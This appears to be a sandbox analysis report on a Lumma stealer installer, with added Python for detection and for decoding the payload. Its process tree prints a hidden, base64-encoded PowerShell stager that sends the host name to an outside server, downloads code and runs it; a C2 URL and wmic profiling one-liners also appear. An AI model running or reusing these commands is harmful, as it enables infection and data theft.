Overview

Score  Task                    Platform
10     Static                  -
3      183c6aa694...90.exe     windows7-x64
10     183c6aa694...90.exe     windows10-2004-x64
10     install.exe             windows7-x64
10     install.exe             windows10-2004-x64
10     jre/Welcome.html        windows7-x64
3      jre/Welcome.html        windows10-2004-x64
3      jre/bin/JA...32.dll     windows7-x64
3      jre/bin/JA...32.dll     windows10-2004-x64
3      jre/bin/JA...ge.dll     windows7-x64
3      jre/bin/JA...ge.dll     windows10-2004-x64
3      jre/bin/Ja...32.dll     windows7-x64
3      jre/bin/Ja...32.dll     windows10-2004-x64
3      jre/bin/Ja...ge.dll     windows7-x64
3      jre/bin/Ja...ge.dll     windows10-2004-x64
3      jre/bin/Wi...32.dll     windows7-x64
3      jre/bin/Wi...32.dll     windows10-2004-x64
3      jre/bin/Wi...ge.dll     windows7-x64
3      jre/bin/Wi...ge.dll     windows10-2004-x64
3      jre/bin/awt.dll         windows7-x64
3      jre/bin/awt.dll         windows10-2004-x64
3      jre/bin/bci.dll         windows7-x64
3      jre/bin/bci.dll         windows10-2004-x64
3      jre/bin/cl...vm.dll     windows7-x64
3      jre/bin/cl...vm.dll     windows10-2004-x64
3      jre/bin/dcpr.dll        windows7-x64
3      jre/bin/dcpr.dll        windows10-2004-x64
3      jre/bin/de...se.dll     windows7-x64
3      jre/bin/de...se.dll     windows10-2004-x64
3      jre/bin/deploy.dll      windows7-x64
3      jre/bin/deploy.dll      windows10-2004-x64
3      jre/bin/dt_shmem.dll    windows7-x64
3      jre/bin/dt_shmem.dll    windows10-2004-x64
Analysis

max time kernel   144s
max time network  154s
platform          windows7_x64
resource          win7-20240903-en
resource tags     arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted         21-11-2024 19:10
Static task
static1

Behavioral tasks

Task          Sample                                                                 Resource
behavioral1   183c6aa694124103e3896ee7b71175f4a81d9533218617cb80d60d9307b53c90.exe  win7-20241010-en
behavioral2   183c6aa694124103e3896ee7b71175f4a81d9533218617cb80d60d9307b53c90.exe  win10v2004-20241007-en
behavioral3   install.exe                                                            win7-20240903-en
behavioral4   install.exe                                                            win10v2004-20241007-en
behavioral5   jre/Welcome.html                                                       win7-20241010-en
behavioral6   jre/Welcome.html                                                       win10v2004-20241007-en
behavioral7   jre/bin/JAWTAccessBridge-32.dll                                        win7-20240903-en
behavioral8   jre/bin/JAWTAccessBridge-32.dll                                        win10v2004-20241007-en
behavioral9   jre/bin/JAWTAccessBridge.dll                                           win7-20240729-en
behavioral10  jre/bin/JAWTAccessBridge.dll                                           win10v2004-20241007-en
behavioral11  jre/bin/JavaAccessBridge-32.dll                                        win7-20240903-en
behavioral12  jre/bin/JavaAccessBridge-32.dll                                        win10v2004-20241007-en
behavioral13  jre/bin/JavaAccessBridge.dll                                           win7-20240903-en
behavioral14  jre/bin/JavaAccessBridge.dll                                           win10v2004-20241007-en
behavioral15  jre/bin/WindowsAccessBridge-32.dll                                     win7-20241023-en
behavioral16  jre/bin/WindowsAccessBridge-32.dll                                     win10v2004-20241007-en
behavioral17  jre/bin/WindowsAccessBridge.dll                                        win7-20240708-en
behavioral18  jre/bin/WindowsAccessBridge.dll                                        win10v2004-20241007-en
behavioral19  jre/bin/awt.dll                                                        win7-20240903-en
behavioral20  jre/bin/awt.dll                                                        win10v2004-20241007-en
behavioral21  jre/bin/bci.dll                                                        win7-20240903-en
behavioral22  jre/bin/bci.dll                                                        win10v2004-20241007-en
behavioral23  jre/bin/client/jvm.dll                                                 win7-20241010-en
behavioral24  jre/bin/client/jvm.dll                                                 win10v2004-20241007-en
behavioral25  jre/bin/dcpr.dll                                                       win7-20240903-en
behavioral26  jre/bin/dcpr.dll                                                       win10v2004-20241007-en
behavioral27  jre/bin/decora_sse.dll                                                 win7-20240903-en
behavioral28  jre/bin/decora_sse.dll                                                 win10v2004-20241007-en
behavioral29  jre/bin/deploy.dll                                                     win7-20240903-en
behavioral30  jre/bin/deploy.dll                                                     win10v2004-20241007-en
behavioral31  jre/bin/dt_shmem.dll                                                   win7-20240903-en
behavioral32  jre/bin/dt_shmem.dll                                                   win10v2004-20241007-en
General

Target  install.exe
Size    136KB
MD5     fca89c62d6ea9f979b3a8d21ee2c4f55
SHA1    bd77809998b5cfef93e3c34af3ddb8292f549d44
SHA256  6b069e5b450898615e709275bc0a53b529f171301a603093bdc17ebd784e0e34
SHA512  f1f1f30d0c07c343d9709dd4a6405751de678886703bd59f2d72751f3d470ca88389b3ce3ba5966282e6f60ae68f13de722e885f4bd1bfae2aad60323edf7df0
SSDEEP  1536:xZ2FWSNhd/4131iO08SKKAP7wBwp8wZtE:T2ddQ131i1pKJP7w2p
Malware Config
Extracted
lumma
https://quotedjizwe.cyou/api
Signatures

Lumma family

Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
Run PowerShell and hide the display window.
  PID 2220  powershell.exe

Executes dropped EXE (2 IoCs)
  PID 2792  EASteamProxy.exe
  PID 1608  EASteamProxy.exe

Loads dropped DLL (20 IoCs)
  PID 2884  cmd.exe           (1 load)
  PID 2792  EASteamProxy.exe  (10 loads)
  PID 1608  EASteamProxy.exe  (9 loads)

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
  flow 2  pastebin.com
  flow 3  pastebin.com

Suspicious use of SetThreadContext (1 IoC)
  PID 1608 (EASteamProxy.exe) set thread context of PID 1692; sandbox target procid 65

System Location Discovery: System Language Discovery (1 TTP, 24 IoCs)
Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
  Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
  Opened by: cmd.exe (7), chcp.com (5), more.com (3), WMIC.exe (3), explorer.exe (2), powershell.exe, install.exe, AcroRd32.exe, javaw.exe

Suspicious behavior: EnumeratesProcesses (6 IoCs)
  PID 2220  powershell.exe
  PID 2792  EASteamProxy.exe
  PID 1608  EASteamProxy.exe  (2)
  PID 1692  cmd.exe           (2)

Suspicious behavior: MapViewOfSection (2 IoCs)
  PID 1608  EASteamProxy.exe
  PID 1692  cmd.exe

Suspicious use of AdjustPrivilegeToken (64 IoCs)
  PID 1616  WMIC.exe  enabled, twice in succession: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35
  PID 608   WMIC.exe  the same 20 privileges once, then SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege (the report lists 64 entries)

Suspicious use of SetWindowsHookEx (5 IoCs)
  PID 1072  javaw.exe     (2)
  PID 1104  AcroRd32.exe  (3)

Suspicious use of WriteProcessMemory (64 IoCs)
  Writer (PID, image) -> target PID   (writes, sandbox target procid)
  2052 install.exe -> 1072   (7, 31)
  1072 javaw.exe   -> 760    (7, 32)
  760  cmd.exe     -> 540    (7, 34)
  760  cmd.exe     -> 2584   (4, 35)
  1072 javaw.exe   -> 2896   (7, 36)
  2896 cmd.exe     -> 2812   (7, 38)
  2896 cmd.exe     -> 1616   (7, 39)
  2896 cmd.exe     -> 2664   (7, 40)
  1072 javaw.exe   -> 2940   (7, 42)
  2940 cmd.exe     -> 912    (4, 44)
  (the report lists 64 entries)
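As an added detection example that is not part of this report: in the process tree, javaw.exe drives three cmd /c one-liners that set code page 866, ask wmic for the CPU name, the video adapter vendor and the total physical memory, and pipe the answer through more.com, then launches a hidden, policy-bypassing PowerShell that base64-decodes a script and hands it to Invoke-Expression. The Python below runs that logic over constructed process-creation records (pid, ppid, image, command line) modelled on the tree, plus one benign wmic call as a control. The record layout, the two-query threshold and the finding names are this example's own, not a sandbox or SIEM schema.

```python
import re
from collections import defaultdict

# Constructed process-creation records (pid, ppid, image, command line) modelled
# on the javaw.exe subtree in this report. Not a sandbox export: PIDs and command
# lines follow the report, the base64 blob is elided, the last record is benign.
EVENTS = [
    (2896, 1072, "cmd.exe",
     r'C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & '
     r'C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List | C:\Windows\System32\more.com"'),
    (2940, 1072, "cmd.exe",
     r'C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & '
     r'C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List | C:\Windows\System32\more.com"'),
    (2696, 1072, "cmd.exe",
     r'C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & '
     r'C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List | C:\Windows\System32\more.com"'),
    (2220, 1072, "powershell.exe",
     'powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command '
     '"& {$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(\'<blob>\')); Invoke-Expression $script}"'),
    (4100, 4000, "wmic.exe", "wmic cpu get name"),  # benign control: one query, no wrapper
]

# The three hardware-profiling queries the report shows.
RECON_QUERIES = {
    "cpu model": re.compile(r"wmic(?:\.exe)?\s+cpu\s+get\s+name", re.I),
    "gpu vendor": re.compile(r"wmic(?:\.exe)?\s+path\s+win32_videocontroller\s+get\s+adaptercompatibility", re.I),
    "physical memory": re.compile(r"wmic(?:\.exe)?\s+path\s+win32_computersystem\s+get\s+totalphysicalmemory", re.I),
}
# "chcp NNN>nul & ... | more.com": set the OEM code page, silence it, capture output.
CHCP_MORE_WRAPPER = re.compile(r"chcp(?:\.com)?\s+\d+\s*>\s*nul\s*&.*\|\s*\S*more(?:\.com)?", re.I)
# Hidden window + policy bypass + base64 decode feeding Invoke-Expression.
HIDDEN_ENCODED_PS = [
    re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    re.compile(r"-e(?:xecutionpolicy)?\s+bypass", re.I),
    re.compile(r"frombase64string.*(?:\biex\b|invoke-expression)", re.I | re.S),
]


def recon_queries(cmdline: str) -> list:
    """Names of the hardware-profiling queries present in one command line."""
    return [name for name, rx in RECON_QUERIES.items() if rx.search(cmdline)]


def uses_chcp_more_wrapper(cmdline: str) -> bool:
    return CHCP_MORE_WRAPPER.search(cmdline) is not None


def is_hidden_encoded_powershell(image: str, cmdline: str) -> bool:
    return image.lower() == "powershell.exe" and all(rx.search(cmdline) for rx in HIDDEN_ENCODED_PS)


def fingerprinting_parents(events, min_distinct: int = 2) -> dict:
    """Map each parent PID to the distinct hardware queries its children ran.
    One ad-hoc query is ordinary admin activity; one parent collecting CPU, GPU
    and RAM in succession is the environment check this report shows."""
    seen = defaultdict(set)
    for _pid, ppid, _image, cmdline in events:
        seen[ppid].update(recon_queries(cmdline))
    return {ppid: sorted(q) for ppid, q in seen.items() if len(q) >= min_distinct}


def detect(events) -> list:
    """Return (finding, subject, detail) tuples for the whole record set."""
    findings = [("hardware_fingerprinting", ppid, queries)
                for ppid, queries in fingerprinting_parents(events).items()]
    wrapped = [pid for pid, _ppid, _image, cmd in events if uses_chcp_more_wrapper(cmd)]
    if wrapped:
        findings.append(("chcp_more_output_capture", wrapped, None))
    for pid, _ppid, image, cmd in events:
        if is_hidden_encoded_powershell(image, cmd):
            findings.append(("hidden_encoded_powershell", pid, None))
    return findings


if __name__ == "__main__":
    for finding in detect(EVENTS):
        print(finding)
```

The grouping by parent is what keeps the rule quiet on a help-desk technician running `wmic cpu get name` once: the benign control produces a single query under PID 4000 and is dropped, while PID 1072 is reported with all three. In a real pipeline the parent key would be the parent's process GUID rather than its PID, since PIDs are reused (this report itself reuses 1608).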
Processes

[1] C:\Users\Admin\AppData\Local\Temp\install.exe
    "C:\Users\Admin\AppData\Local\Temp\install.exe"
    PID 2052 | System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory

  [2] C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe
      "C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "lib\.;lib\..;lib\asm-all.jar;lib\dn-compiled-module.jar;lib\dn-php-sdk.jar;lib\gson.jar;lib\jphp-app-framework.jar;lib\jphp-core.jar;lib\jphp-desktop-ext.jar;lib\jphp-gui-ext.jar;lib\jphp-json-ext.jar;lib\jphp-runtime.jar;lib\jphp-xml-ext.jar;lib\jphp-zend-ext.jar;lib\jphp-zip-ext.jar;lib\slf4j-api.jar;lib\slf4j-simple.jar;lib\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher
      PID 1072 | System Location Discovery: System Language Discovery; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory

    [3] C:\Windows\SysWOW64\cmd.exe
        C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild""
        PID 760 | System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory

      [4] C:\Windows\SysWOW64\chcp.com
          C:\Windows\System32\chcp.com 65001
          PID 540 | System Location Discovery: System Language Discovery

      [4] C:\Windows\system32\reg.exe
          C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild"
          PID 2584

    [3] C:\Windows\SysWOW64\cmd.exe
        C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List | C:\Windows\System32\more.com"
        PID 2896 | System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory

      [4] C:\Windows\SysWOW64\chcp.com
          C:\Windows\System32\chcp.com 866
          PID 2812 | System Location Discovery: System Language Discovery

      [4] C:\Windows\SysWOW64\wbem\WMIC.exe
          C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List
          PID 1616 | System Location Discovery: System Language Discovery; Suspicious use of AdjustPrivilegeToken

      [4] C:\Windows\SysWOW64\more.com
          C:\Windows\System32\more.com
          PID 2664 | System Location Discovery: System Language Discovery

    [3] C:\Windows\SysWOW64\cmd.exe
        C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List | C:\Windows\System32\more.com"
        PID 2940 | System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory

      [4] C:\Windows\SysWOW64\chcp.com
          C:\Windows\System32\chcp.com 866
          PID 912 | System Location Discovery: System Language Discovery

      [4] C:\Windows\SysWOW64\wbem\WMIC.exe
          C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List
          PID 608 | System Location Discovery: System Language Discovery; Suspicious use of AdjustPrivilegeToken

      [4] C:\Windows\SysWOW64\more.com
          C:\Windows\System32\more.com
          PID 1132 | System Location Discovery: System Language Discovery

    [3] C:\Windows\SysWOW64\cmd.exe
        C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List | C:\Windows\System32\more.com"
        PID 2696 | System Location Discovery: System Language Discovery

      [4] C:\Windows\SysWOW64\chcp.com
          C:\Windows\System32\chcp.com 866
          PID 1280 | System Location Discovery: System Language Discovery

      [4] C:\Windows\SysWOW64\wbem\WMIC.exe
          C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List
          PID 1608 | System Location Discovery: System Language Discovery
          (PID 1608 is reused later in the run by the second EASteamProxy.exe instance; the Signatures tables attribute 1608 to EASteamProxy.exe, so match on the process, not the PID, when correlating.)

      [4] C:\Windows\SysWOW64\more.com
          C:\Windows\System32\more.com
          PID 1684 | System Location Discovery: System Language Discovery

    [3] C:\Windows\SysWOW64\cmd.exe
        C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19""
        PID 1340 | System Location Discovery: System Language Discovery

      [4] C:\Windows\SysWOW64\chcp.com
          C:\Windows\System32\chcp.com 65001
          PID 1252 | System Location Discovery: System Language Discovery

      [4] C:\Windows\system32\reg.exe
          C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19"
          PID 2980

    [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('DQokcj0naHR0cDovL2NhdHNpLm5ldC9pbmNhbGwucGhwP2NvbXBOYW1lPScrJGVudjpjb21wdXRlcm5hbWU7IFtuZXQuU2VydmljRXBPaU50bUFuYWdlUl06OnNFQ3VyaVRZcFJPVG9jT2wgPSBbbkVULnNlQ1VSSVR5cFJPVG9jb0xUWXBlXTo6VGxzMTI7ICR0dHAgPSBpd3IgJHIgLVVzZUJhc2ljUGFyc2luZyAtVXNlckFnZW50ICdNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjEpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS84MS4wLjQ0NC4xNDMgU2FmYXJpLzUzNy4zNic7IGlleCAkdHRwLkNvbnRlbnQ7')); Invoke-Expression $script}"
        PID 2220 | Command and Scripting Interpreter: PowerShell; System Location Discovery: System Language Discovery; Suspicious behavior: EnumeratesProcesses

    [3] C:\Windows\SysWOW64\cmd.exe
        cmd /c "cd /d "C:\Users\Admin\AppData\Local\Temp/f9d4395bf27462aa0d2c57efd4ce6cb3/" && (for %F in (*.exe) do start "" "%F")"
        PID 2884 | Loads dropped DLL; System Location Discovery: System Language Discovery

      [4] C:\Users\Admin\AppData\Local\Temp\f9d4395bf27462aa0d2c57efd4ce6cb3\EASteamProxy.exe
          "EASteamProxy.exe"
          PID 2792 | Executes dropped EXE; Loads dropped DLL; Suspicious behavior: EnumeratesProcesses

        [5] C:\Users\Admin\AppData\Roaming\Serverdownload\EASteamProxy.exe
            C:\Users\Admin\AppData\Roaming\Serverdownload\EASteamProxy.exe
            PID 1608 | Executes dropped EXE; Loads dropped DLL; Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: MapViewOfSection

          [6] C:\Windows\SysWOW64\cmd.exe
              C:\Windows\SysWOW64\cmd.exe
              PID 1692 | System Location Discovery: System Language Discovery; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: MapViewOfSection

            [7] C:\Windows\SysWOW64\explorer.exe
                C:\Windows\SysWOW64\explorer.exe
                PID 1884 | System Location Discovery: System Language Discovery

    [3] C:\Windows\SysWOW64\explorer.exe
        explorer C:\Users\Admin\AppData\Local\Temp\a8d90163713ca47df12b6fddba9abda0.pdf
        PID 2416 | System Location Discovery: System Language Discovery

[1] C:\Windows\explorer.exe
    C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
    PID 1988

  [2] C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
      "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\a8d90163713ca47df12b6fddba9abda0.pdf"
      PID 1104 | System Location Discovery: System Language Discovery; Suspicious use of SetWindowsHookEx
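The PowerShell stage that javaw.exe launches (PID 2220 in the tree above) hides its real script inside a base64 -Command argument. As an added example that is not part of the report, the Python below decodes that argument exactly the way the sample does (UTF-8, not the UTF-16LE that -EncodedCommand would use) and pulls out the download URL, the User-Agent and the execution primitives. The blob is the one shown in the process tree; the field names returned by extract_indicators are this example's own.

```python
import base64
import re

# The -Command argument the report records for PID 2220, copied verbatim from the
# process tree (split across lines only for readability).
ENCODED = (
    "DQokcj0naHR0cDovL2NhdHNpLm5ldC9pbmNhbGwucGhwP2NvbXBOYW1lPScrJGVudjpjb21wdXRlcm5hbWU7"
    "IFtuZXQuU2VydmljRXBPaU50bUFuYWdlUl06OnNFQ3VyaVRZcFJPVG9jT2wgPSBbbkVULnNlQ1VSSVR5cFJPVG9jb0xUWXBlXTo6VGxzMTI7"
    "ICR0dHAgPSBpd3IgJHIgLVVzZUJhc2ljUGFyc2luZyAtVXNlckFnZW50ICdNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjEpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS84MS4wLjQ0NC4xNDMgU2FmYXJpLzUzNy4zNic7IGlleCAkdHRwLkNvbnRlbnQ7"
)


def decode_stage(b64: str) -> str:
    """Replicate [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String(...)).
    The sample decodes as UTF-8; a -EncodedCommand payload would need UTF-16LE."""
    return base64.b64decode(b64).decode("utf-8")


def extract_indicators(script: str) -> dict:
    """Pull the fields an analyst wants from a download-and-execute stager.
    Keyword checks run on a lowercased copy because PowerShell type and member
    names are case-insensitive: [net.ServicEpOiNtmAnageR] is string-matching
    evasion, not a different class."""
    low = script.lower()
    ua = re.search(r"-useragent\s+'([^']+)'", script, re.IGNORECASE)
    return {
        "urls": re.findall(r"https?://[^\s'\"]+", script),
        "user_agent": ua.group(1) if ua else None,
        "sends_hostname": "$env:computername" in low,
        "forces_tls12": "tls12" in low,
        "download_and_execute": ("iwr" in low or "invoke-webrequest" in low)
        and ("iex" in low or "invoke-expression" in low),
    }


if __name__ == "__main__":
    stage = decode_stage(ENCODED)
    print(stage)
    for key, value in extract_indicators(stage).items():
        print(f"{key}: {value}")
```

Decoded, the argument is a one-line stager: it builds http://catsi.net/incall.php?compName= plus the host name, forces TLS 1.2, fetches the URL with Invoke-WebRequest under a Chrome-on-Windows-7 User-Agent and passes the response body to Invoke-Expression. The mixed-case [net.ServicEpOiNtmAnageR] and [nET.seCURITypROTocoLTYpe] are ServicePointManager and SecurityProtocolType with randomised casing. That host is a second-stage download location and a separate indicator from the Lumma C2 listed under Malware Config.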
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize  70KB
MD5       49aebf8cbd62d92ac215b2923fb1b9f5
SHA1      1723be06719828dda65ad804298d0431f6aff976
SHA256    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Filesize  181KB
MD5       4ea6026cf93ec6338144661bf1202cd1
SHA1      a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Filesize  51KB
MD5       acfffe6de49ab6bbcb590e95d558111b
SHA1      51d7b4a4ef2851f4787805bd2eebc61f9f62ae34
SHA256    fd0bc347f27e479b565d6095bfdc96ef2f42a7ae8649c40e1e702c8f16ab6217
SHA512    94fd4a2de31420576169b79c9617fb1eed4778fb50c17a9c8587b123169022e9338fe8d4b89bb5de5b06367eed6737e739423416c8be3f7f5f24b75b3b3ee28e

Filesize  564KB
MD5       1ba6d1cf0508775096f9e121a24e5863
SHA1      df552810d779476610da3c8b956cc921ed6c91ae
SHA256    74892d9b4028c05debaf0b9b5d9dc6d22f7956fa7d7eee00c681318c26792823
SHA512    9887d9f5838aa1555ea87968e014edfe2f7747f138f1b551d1f609bc1d5d8214a5fdab0d76fcac98864c1da5eb81405ca373b2a30cb12203c011d89ea6d069af

Filesize  34KB
MD5       69d96e09a54fbc5cf92a0e084ab33856
SHA1      b4629d51b5c4d8d78ccb3370b40a850f735b8949
SHA256    a3a1199de32bbbc8318ec33e2e1ce556247d012851e4b367fe853a51e74ce4ee
SHA512    2087827137c473cdbec87789361ed34fad88c9fe80ef86b54e72aea891d91af50b17b7a603f9ae2060b3089ce9966fad6d7fbe22dee980c07ed491a75503f2cf

Filesize  6.0MB
MD5       2a7f32421b71aaeebd6287f55acdf983
SHA1      217db3af7575622d58f94845b7ee6ceffd6e1c0f
SHA256    d0e476c7573735b01ba7893b7e513ac463316b50b5d6e238878a8567b0b1bc86
SHA512    b5839c867d3ea09f0796482f8040ed5ebb9ddf9917df8ce76ed675e377af97ab0ac06917af0c2d8401afa30c5deb7052e7218c779dd731c7774ca10dc1306bf5

Filesize  1.3MB
MD5       c24c89879410889df656e3a961c59bcc
SHA1      25a9e4e545e86b0a5fe14ee0147746667892fabd
SHA256    739bedcfc8eb860927eb2057474be5b39518aaaa6703f9f85307a432fa1f236e
SHA512    0542c431049e4fd40619579062d206396bef2f6dadadbf9294619c918b9e6c96634dcd404b78c6045974295126ec35dd842c6ec8f42279d9598b57a751cd0034

Filesize  106KB
MD5       49c96cecda5c6c660a107d378fdfc3d4
SHA1      00149b7a66723e3f0310f139489fe172f818ca8e
SHA256    69320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc
SHA512    e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d

Filesize  48KB
MD5       cf0a1c4776ffe23ada5e570fc36e39fe
SHA1      2050fadecc11550ad9bde0b542bcf87e19d37f1a
SHA256    6fd366a691ed68430bcd0a3de3d8d19a0cb2102952bfc140bbef4354ed082c47
SHA512    d95cd98d22ca048d0fc5bca551c9db13d6fa705f6af120bbbb621cf2b30284bfdc7320d0a819bb26dab1e0a46253cc311a370bed4ef72ecb60c69791ed720168

Filesize  19KB
MD5       5df7aef6e2e2691eb57558a45eba260e
SHA1      a9e9053a5a2810f89ff349c5e6bfc98a5271750f
SHA256    93aa2b9642df06986e0cf718a3708d22a30ced07e93c1d16f999f456de982a17
SHA512    1432dc775add2f5ec4c30964fcd58f5e2dde836ebdc10cf9f2404a0e2915d98c89cfc310d2ec16b51c2a3791352c4096d33715628d58db5064d65c35578c0789

Filesize  799KB
MD5       e2658cb392d04822f8d80aad17f8f9ce
SHA1      a5a93b010269939482714985b5bcea25e806088d
SHA256    aec797462aad55a6b688ceb5e1c83c874c3828d4dfc8f2460e5c01342f7728e4
SHA512    31c95479e522d589a0f659a0af0e771ba5634c1515fcffb161b09c97ae60834266846a640bf3a18969a618d1bcb9eff5161bb54108d47b4379fdbaba2a8b67b6

Filesize  2.7MB
MD5       28dea3e780552eb5c53b3b9b1f556628
SHA1      55dccd5b30ce0363e8ebdfeb1cca38d1289748b8
SHA256    52415829d85c06df8724a3d3d00c98f12beabf5d6f3cbad919ec8000841a86e8
SHA512    19dfe5f71901e43ea34d257f693ae1a36433dbdbcd7c9440d9b0f9eea24de65c4a8fe332f7b88144e1a719a6ba791c2048b4dd3e5b1ed0fdd4c813603ad35112

Filesize  669KB
MD5       4ad03043a32e9a1ef64115fc1ace5787
SHA1      352e0e3a628c8626cff7eed348221e889f6a25c4
SHA256    a0e43cbc4a2d8d39f225abd91980001b7b2b5001e8b2b8292537ae39b17b85d1
SHA512    edfae3660a5f19a9deda0375efba7261d211a74f1d8b6bf1a8440fed4619c4b747aca8301d221fd91230e7af1dab73123707cc6eda90e53eb8b6b80872689ba6

Filesize  291KB
MD5       6b4ab6e60364c55f18a56a39021b74a6
SHA1      39cac2889d8ca497ee0d8434fc9f6966f18fa336
SHA256    1db3fd414039d3e5815a5721925dd2e0a3a9f2549603c6cab7c49b84966a1af3
SHA512    c08de8c6e331d13dfe868ab340e41552fc49123a9f782a5a63b95795d5d979e68b5a6ab171153978679c0791dc3e3809c883471a05864041ce60b240ccdd4c21

Filesize  1.0MB
MD5       d6ad61c88061b03d87d8c77f3517b5fb
SHA1      b59334de367c2c34cffa154a9af78cc533d6db79
SHA256    b846353aef9841e56d82c343cef8de2db9e9833c9269b21684d35a929903a823
SHA512    fdf21ea086be1a8ae0f567a61d47c89fe19fcbd1c25bdc036256c7e74d04997bf5499bf8d81142dafd9359de4b7d2a7b9dcfbaf4d057566ff611116371735580

Filesize  3KB
MD5       0a0cea4b38b9a8adb16969e59127a6f8
SHA1      9294ec32beef0f755afeeb94ba52be33d3be4ecb
SHA256    9038f3763578db7ebbc901b22b2ef5b9e730235979401b22424f7d9e7e8a91f6
SHA512    5f2fe577b36b309f65899292013d0c5cfe9b3d3e9363ad4a72781b052b40ba8b0b56fc02e56a9baf885911c23e6a13412aed812f1674f2bba6384ba73fe0e432

Filesize  5.4MB
MD5       ad2735f096925010a53450cb4178c89e
SHA1      c6d65163c6315a642664f4eaec0fae9528549bfe
SHA256    4e775b5fafb4e6d89a4694f8694d2b8b540534bd4a52ff42f70095f1c929160e
SHA512    1868b22a7c5cba89545b06f010c09c5418b3d86039099d681eee9567c47208fdba3b89c6251cf03c964c58c805280d45ba9c3533125f6bd3e0bc067477e03ab9